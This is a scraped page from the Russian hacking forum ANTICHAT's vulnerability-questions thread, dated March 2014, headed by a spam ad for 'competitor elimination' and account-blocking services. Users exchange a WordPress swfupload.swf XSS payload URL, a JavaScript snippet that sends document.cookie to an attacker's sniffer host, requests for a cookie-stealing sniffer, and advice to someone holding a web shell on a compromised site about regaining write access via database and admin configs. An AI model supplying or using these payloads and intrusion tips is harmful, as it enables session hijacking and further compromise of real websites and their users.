УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2337 из 2438

2337

Опции темы

Поиск в этой теме

Опции просмотра

#23361

03.03.2014, 19:31

OxoTnik

Guest

Сообщений: n/a

Провел на форуме:
290351

Репутация: 173

Цитата:

Сообщение от MaxFast

MaxFast said:
Ищешь уязвимый сайт => подставляешь JS код.

Он имеет ввиду атака через уязвимый flash плагин, но там показан пример ниже

#23362

03.03.2014, 20:22

CoolHucker

Guest

Сообщений: n/a

Провел на форуме:
6813

Репутация: 0

это понятно)прописываю

Код:

Code:
http://site/wp-includes/js/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28document.cookie%29;//

даёт мои куки,как я понял.затем написано undefined кликаю,открывается окно заливки файлов..Но что нужно залить?непосредственно js со сниффером?

#23363

03.03.2014, 20:51

MaxFast

Guest

Сообщений: n/a

Провел на форуме:
178623

Репутация: 94

Цитата:

Сообщение от CoolHucker

CoolHucker said:
это понятно)прописываю

Код:

Code:
http://site/wp-includes/js/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28document.cookie%29;//

даёт мои куки,как я понял.затем написано undefined кликаю,открывается окно заливки файлов.
.Но что нужно залить?непосредственно js со сниффером?

Ну в интернете тема с XSS изъезженна.

Примитивный JS код:

Код:

Code:
img = new Image();
img.src = "http://доменсниффера.ру/сниффер.gif?"+document.cookie;

#23364

03.03.2014, 20:57

CoolHucker

Guest

Сообщений: n/a

Провел на форуме:
6813

Репутация: 0

Цитата:

Сообщение от None

Ну в интернете тема с XSS изъезженна.

Не пинай чайника) нужно залить файл с расширением js,в котором написан этот скрипт)так?

#23365

03.03.2014, 20:59

MaxFast

Guest

Сообщений: n/a

Провел на форуме:
178623

Репутация: 94

Цитата:

Сообщение от CoolHucker

CoolHucker said:
Не пинай чайника) нужно залить файл с расширением js,в котором написан этот скрипт)так?

Если ты можешь залить .html файл с JS кодом и картинкой сниффера - б-га ради.

А так нужно выполнить код в рамках XSS (Именно там где алерт).

#23366

03.03.2014, 21:02

CoolHucker

Guest

Сообщений: n/a

Провел на форуме:
6813

Репутация: 0

Цитата:

Сообщение от None

Если ты можешь залить .html файл с JS кодом и картинкой сниффера - б-га ради.
А так нужно выполнить код в рамках XSS (Именно там где алерт).

почитал)вроде понял)благодарю

#23367

03.03.2014, 23:32

Грабитель

Guest

Сообщений: n/a

Провел на форуме:
69791

Репутация: -7

Подскажите.

Имею шелл на сайте, все права и папки закрытые на запись, но все файлы (и папки) принадлежат пользователю apache, то есть тот же пользователь что и например веб шелл.

На сервере выключены системные команд, и в disable functions стоит функция chmod()

Что можно сделать в данной ситуации, чтобы файлы были снова врайтабельными?

#23368

04.03.2014, 00:11

Unknown

Guest

Сообщений: n/a

Провел на форуме:
15642

Репутация: 6

Цитата:

Сообщение от Грабитель

Грабитель said:
Подскажите.
Имею шелл на сайте, все права и папки закрытые на запись, но все файлы (и папки) принадлежат пользователю apache, то есть тот же пользователь что и например веб шелл.
На сервере выключены системные команд, и в disable functions стоит функция chmod()
Что можно сделать в данной ситуации, чтобы файлы были снова врайтабельными?

как вариант попробовать изменить дефолтное значение чмод, которая описана вроде в системном файле

#23369

05.03.2014, 13:16

CoolHucker

Guest

Сообщений: n/a

Провел на форуме:
6813

Репутация: 0

Подскажите пожалуйста Web сниффер для кражи куки. И ещё ,что нужно вставить вместо слова сниффер или можно оставить так?

Цитата:

Сообщение от None

img = new Image();
img.src = "http://доменсниффера.ру/сниффер.gif?"+document.cookie;

#23370

05.03.2014, 19:24

Unknown

Guest

Сообщений: n/a

Провел на форуме:
114076

Репутация: 54

Цитата:

Сообщение от None

Имею шелл на сайте, все права и папки закрытые на запись, но все файлы (и папки) принадлежат пользователю apache, то есть тот же пользователь что и например веб шелл.
На сервере выключены системные команд, и в disable functions стоит функция chmod()
Что можно сделать в данной ситуации, чтобы файлы были снова врайтабельными?

Едва ли вообще все закрыто, если сайты не статичны. Загрузка хлама в админках, кеш и прочая фигня обычно доступны для записи. Ищите конфиги от баз и админок, попробуйте пройти через бд.

Цитата:

Сообщение от None

Годный сниффер реализуется одним лишь веб-сервером. Никакой пхп тут не нужен. Для кук ничего больше не нужно, но, возможно, есть смысл посмотреть в сторону beef.

Страница 2337 из 2438

2337

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход